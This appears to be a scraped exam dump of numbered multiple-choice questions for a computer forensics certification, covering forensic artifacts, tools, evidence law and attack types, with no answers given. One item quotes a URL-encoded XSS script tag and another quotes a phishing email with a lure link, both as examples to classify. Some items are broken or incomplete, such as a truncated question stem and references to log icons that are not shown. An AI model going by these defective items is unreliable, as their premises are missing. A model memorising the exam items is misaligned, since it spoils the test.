After suspecting a change in MS-Exchange Server storage archive, the investigator has analyzed it. Which of the following components is not an actual part of the archive?

A.

PRIV.STM

B.

PUB.EDB

C.

PRIV.EDB

D.

PUB.STM

Full Access
Question # 123

Buffer overflow vulnerability of a web application occurs when it fails to guard its buffer properly and allows writing beyond its maximum size. Thus, it overwrites the_________. There are multiple forms of buffer overflow, including a Heap Buffer Overflow and a Format String Attack.

A.

Adjacent memory locations

B.

Adjacent bit blocks

C.

Adjacent buffer locations

D.

Adjacent string locations

Full Access
Question # 124

BMP (Bitmap) is a standard file format for computers running the Windows operating system. BMP images can range from black and white (1 bit per pixel) up to 24 bit color (16.7 million colors). Each bitmap file contains a header, the RGBQUAD array, information header, and image data. Which of the following element specifies the dimensions, compression type, and color format for the bitmap?

A.

Information header

B.

Image data

C.

The RGBQUAD array

D.

Header

Full Access
Question # 125

Which of the following tool can reverse machine code to assembly language?

A.

PEiD

B.

RAM Capturer

C.

IDA Pro

D.

Deep Log Analyzer

Full Access
Question # 126

What technique is used by JPEGs for compression?

A.

TIFF-8

B.

ZIP

C.

DCT

D.

TCD

Full Access
Question # 127

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?

A.

Speculation or opinion as to the cause of the incident

B.

Purpose of the report

C.

Author of the report

D.

Incident summary

Full Access
Question # 128

Adam, a forensic analyst, is preparing VMs for analyzing a malware. Which of the following is NOT a best practice?

A.

Isolating the host device

B.

Installing malware analysis tools

C.

Using network simulation tools

D.

Enabling shared folders

Full Access
Question # 129

Investigators can use the Type Allocation Code (TAC) to find the model and origin of a mobile device. Where is TAC located in mobile devices?

A.

International Mobile Equipment Identifier (IMEI)

B.

Integrated circuit card identifier (ICCID)

C.

International mobile subscriber identity (IMSI)

D.

Equipment Identity Register (EIR)

Full Access
Question # 130

UEFI is a specification that defines a software interface between an OS and platform firmware. Where does this interface store information about files present on a disk?

A.

BIOS-MBR

B.

GUID Partition Table (GPT)

C.

Master Boot Record (MBR)

D.

BIOS Parameter Block

Full Access
Question # 131

As part of extracting the system data, Jenifer has used the netstat command. What does this tool reveal?

A.

Status of users connected to the internet

B.

Net status of computer usage

C.

Information about network connections

D.

Status of network hardware

Full Access
Question # 132

Graphics Interchange Format (GIF) is a ____ RGB bitmap image format for images with up to 256 distinct colors per frame.

A.

8-bit

B.

32-bit

C.

16-bit

D.

24-bit

Full Access
Question # 133

Which of the following is found within the unique instance ID key and helps investigators to map the entry from USBSTOR key to the MountedDevices key?

A.

ParentIDPrefix

B.

LastWrite

C.

UserAssist key

D.

MRUListEx key

Full Access
Question # 134

As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing . What document describes the specifics of the testing, the associated violations, and essentially protects both the organization’s interest and your liabilities as a tester?

A.

Project Scope

B.

Rules of Engagement

C.

Non-Disclosure Agreement

D.

Service Level Agreement

Full Access
Question # 135

An International Mobile Equipment Identifier (IMEI) is a 15-digit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number that provide information about the model and origin of the mobile device is also known as:

A.

Type Allocation Code (TAC)

B.

Integrated Circuit Code (ICC)

C.

Manufacturer Identification Code (MIC)

D.

Device Origin Code (DOC)

Full Access
Question # 136

Identify the term that refers to individuals who, by virtue of their knowledge and expertise, express an independent opinion on a matter related to a case based on the information that is provided.

A.

Expert Witness

B.

Evidence Examiner

C.

Forensic Examiner

D.

Defense Witness

Full Access
Question # 137

Steve, a forensic investigator, was asked to investigate an email incident in his organization. The organization has Microsoft Exchange Server deployed for email communications. Which among the following files will Steve check to analyze message headers, message text, and standard attachments?

A.

PUB.EDB

B.

PRIV.EDB

C.

PUB.STM

D.

PRIV.STM

Full Access
Question # 138

Which of the following does Microsoft Exchange E-mail Server use for collaboration of various e-mail applications?

A.

Simple Mail Transfer Protocol (SMTP)

B.

Messaging Application Programming Interface (MAPI)

C.

Internet Message Access Protocol (IMAP)

D.

Post Office Protocol version 3 (POP3)

Full Access
Question # 139

Joshua is analyzing an MSSQL database for finding the attack evidence and other details, where should he look for the database logs?

A.

Model.log

B.

Model.txt

C.

Model.ldf

D.

Model.lgf

Full Access
Question # 140

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?

A.

Robust copy

B.

Incremental backup copy

C.

Bit-stream copy

D.

Full backup copy

Full Access
Question # 141

%3cscript%3ealert(”XXXXXXXX”)%3c/script%3e is a script obtained from a Cross-Site Scripting attack. What type of encoding has the attacker employed?

A.

Double encoding

B.

Hex encoding

C.

Unicode

D.

Base64

Full Access
Question # 142

Lynne receives the following email:

Dear lynne@gmail.com! We are sorry to inform you that your ID has been temporarily frozen due to incorrect or missing information saved at 2016/11/10 20:40:24

You have 24 hours to fix this problem or risk to be closed permanently!

To proceed Please Connect >> My Apple ID

Thank You The link to My Apple ID shows http://byggarbetsplatsen.se/backup/signon/

What type of attack is this?

A.

Mail Bombing

B.

Phishing

C.

Email Spamming

D.

Email Spoofing

Full Access
Question # 143

To reach a bank web site, the traffic from workstations must pass through a firewall. You have been asked to review the firewall configuration to ensure that workstations in network 10.10.10.0/24 can only reach the bank web site 10.20.20.1 using https. Which of the following firewall rules meets this requirement?

A.

if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 443) then permit

B.

if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 80 or 443) then permit

C.

if (source matches 10.10.10.0 and destination matches 10.20.20.1 and port matches 443) then permit

Full Access
Question # 144

An attacker has compromised a cloud environment of a company and used the employee information to perform an identity theft attack. Which type of attack is this?

A.

Cloud as a subject

B.

Cloud as a tool

C.

Cloud as an object

D.

Cloud as a service

Full Access
Question # 145

Which of the following web browser uses the Extensible Storage Engine (ESE) database format to store browsing records, including history, cache, and cookies?

A.

Safari

B.

Mozilla Firefox

C.

Microsoft Edge

D.

Google Chrome

Full Access
Question # 146

Which of the following registry hive gives the configuration information about which application was used to open various files on the system?

A.

HKEY_CLASSES_ROOT

B.

HKEY_CURRENT_CONFIG

C.

HKEY_LOCAL_MACHINE

D.

HKEY_USERS

Full Access
Question # 147

Which among the following U.S. laws requires financial institutions—companies that offer consumers financial products or services such as loans, financial or investment advice, or insurance—to protect their customers’ information against security threats?

A.

SOX

B.

HIPAA

C.

GLBA

D.

FISMA

Full Access
Question # 148

During forensics investigations, investigators tend to collect the system time at first and compare it with UTC. What does the abbreviation UTC stand for?

A.

Coordinated Universal Time

B.

Universal Computer Time

C.

Universal Time for Computers

D.

Correlated Universal Time

Full Access
Question # 149

companyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware.

A.

Source code review

B.

Reviewing the firewalls configuration

C.

Data items and vulnerability scanning

D.

Interviewing employees and network engineers

Full Access
Question # 150

Which of the following information is displayed when Netstat is used with -ano switch?

A.

Ethernet statistics

B.

Contents of IP routing table

C.

Details of routing table

D.

Details of TCP and UDP connections

Full Access
Question # 151

Which of the following application password cracking tool can discover all password-protected items on a computer and decrypts them?

A.

TestDisk for Windows

B.

R-Studio

C.

Windows Password Recovery Bootdisk

D.

Passware Kit Forensic

Full Access
Question # 152

Which of the following tool is used to locate IP addresses?

A.

SmartWhois

B.

Deep Log Analyzer

C.

Towelroot

D.

XRY LOGICAL

Full Access
Question # 153

What does the Rule 101 of Federal Rules of Evidence states?

A.

Scope of the Rules, where they can be applied

B.

Purpose of the Rules

C.

Limited Admissibility of the Evidence

D.

Rulings on Evidence

Full Access
Question # 154

Where should the investigator look for the Edge browser’s browsing records, including history, cache, and cookies?

A.

ESE Database

B.

Virtual Memory

C.

Sparse files

D.

Slack Space

Full Access
Question # 155

Korey, a data mining specialist in a knowledge processing firm DataHub.com, reported his CISO that he has lost certain sensitive data stored on his laptop. The CISO wants his forensics investigation team to find if the data loss was accident or intentional. In which of the following category this case will fall?

A.

Civil Investigation

B.

Administrative Investigation

C.

Both Civil and Criminal Investigations

D.

Criminal Investigation

Full Access
Question # 156

Gill is a computer forensics investigator who has been called upon to examine a seized computer. This computer, according to the police, was used by a hacker who gained access to numerous banking institutions to steal customer information. After preliminary investigations, Gill finds in the computer’s log files that the hacker was able to gain access to these banks through the use of Trojan horses. The hacker then used these Trojan horses to obtain remote access to the companies’ domain controllers. From this point, Gill found that the hacker pulled off the SAM files from the domain controllers to then attempt and crack network passwords. What is the most likely password cracking technique used by this hacker to break the user passwords from the SAM files?

A.

Syllable attack

B.

Hybrid attack

C.

Brute force attack

D.

Dictionary attack

Full Access
Question # 157

Checkpoint Firewall logs can be viewed through a Check Point Log viewer that uses icons and colors in the log table to represent different security events and their severity. What does the icon in the checkpoint logs represent?

A.

The firewall rejected a connection

B.

A virus was detected in an email

C.

The firewall dropped a connection

D.

An email was marked as potential spam

Full Access
Question # 158

What is the framework used for application development for iOS-based mobile devices?

A.

Cocoa Touch

B.

Dalvik

C.

Zygote

D.

AirPlay

Full Access
Question # 159

Which of the following is NOT an anti-forensics technique?

A.

Data Deduplication

B.

Password Protection

C.

Encryption

D.

Steganography

Full Access
Question # 160

Which of the following standard represents a legal precedent set in 1993 by the Supreme Court of the United States regarding the admissibility of expert witnesses' testimony during federal legal proceedings?

A.

SWGDE & SWGIT

B.

IOCE

C.

Frye

D.

Daubert

Full Access
Question # 161

Which of the following statements is incorrect when preserving digital evidence?

A.

Verify if the monitor is in on, off, or in sleep mode

B.

Turn on the computer and extract Windows event viewer log files

C.

Remove the plug from the power router or modem

D.

Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals

Full Access
Question # 162

Which of the following network attacks refers to sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address is hosted so as to cause a denial-of-service attack?

A.

Email spamming

B.

Phishing

C.

Email spoofing

D.

Mail bombing

Full Access
Question # 163

Examination of a computer by a technically unauthorized person will almost always result in:

A.

Rendering any evidence found inadmissible in a court of law

B.

Completely accurate results of the examination

C.

The chain of custody being fully maintained

D.

Rendering any evidence found admissible in a court of law

Full Access
Question # 164

Robert, a cloud architect, received a huge bill from the cloud service provider, which usually doesn't happen. After analyzing the bill, he found that the cloud resource consumption was very high. He then examined the cloud server and discovered that a malicious code was running on the server, which was generating huge but harmless traffic from the server. This means that the server has been compromised by an attacker with the sole intention to hurt the cloud customer financially. Which attack is described in the above scenario?

A.

XSS Attack

B.

DDoS Attack (Distributed Denial of Service)

C.

Man-in-the-cloud Attack

D.

EDoS Attack (Economic Denial of Service)

Full Access
Question # 165

What do you call the process of studying the changes that have taken place across a system or a machine after a series of actions or incidents?

A.

Windows Services Monitoring

B.

System Baselining

C.

Start-up Programs Monitoring

D.

Host integrity Monitoring

Full Access
Question # 166

A Linux system is undergoing investigation. In which directory should the investigators look for its current state data if the system is in powered on state?

A.

/auth

B.

/proc

C.

/var/log/debug

D.

/var/spool/cron/

Full Access
Question # 167

Which program uses different techniques to conceal a malware's code, thereby making it difficult for security mechanisms to detect or remove it?

A.

Dropper

B.

Packer

C.

Injector

D.

Obfuscator

Full Access
Question # 168

Which of the following setups should a tester choose to analyze malware behavior?

A.

A virtual system with internet connection

B.

A normal system without internet connect

C.

A normal system with internet connection

D.

A virtual system with network simulation for internet connection

Full Access
Question # 169

Which among the following tools can help a forensic investigator to access the registry files during postmortem analysis?

A.

RegistryChangesView

B.

RegDIIView

C.

RegRipper

D.

ProDiscover

Full Access
Question # 170

Which of the following file formats allows the user to compress the acquired data as well as keep it randomly accessible?

A.

Proprietary Format

B.

Generic Forensic Zip (gfzip)

C.

Advanced Forensic Framework 4

D.

Advanced Forensics Format (AFF)

Full Access
Question # 171

Which of the following standard represents a legal precedent regarding the admissibility of scientific examinations or experiments in legal cases?

A.

SWGDE & SWGIT

B.

Daubert

C.

Frye

D.

IOCE

Full Access
Question # 172

In a computer that has Dropbox client installed, which of the following files related to the Dropbox client store information about local Dropbox installation and the Dropbox user account, along with email IDs linked with the account?

A.

config.db

B.

install.db

C.

sigstore.db

D.

filecache.db

Full Access
Question # 173

An investigator is analyzing a checkpoint firewall log and comes across symbols. What type of log is he looking at?

312-49v9 question answer

A.

Security event was monitored but not stopped

B.

Malicious URL detected

C.

An email marked as potential spam

D.

Connection rejected

Full Access
Question # 174

What does the bytes 0x0B-0x53 represent in the boot sector of NTFS volume on Windows 2000?

A.

Jump instruction and the OEM ID

B.

BIOS Parameter Block (BPB) and the OEM ID

C.

BIOS Parameter Block (BPB) and the extended BPB

D.

Bootstrap code and the end of the sector marker

Full Access
Question # 175

Which cloud model allows an investigator to acquire the instance of a virtual machine and initiate the forensics examination process?

A.

PaaS model

B.

IaaS model

C.

SaaS model

D.

SecaaS model

Full Access
Question # 176

Which of the following attack uses HTML tags like <script></script>?

A.

Phishing

B.

XSS attack

C.

SQL injection

D.

Spam

Full Access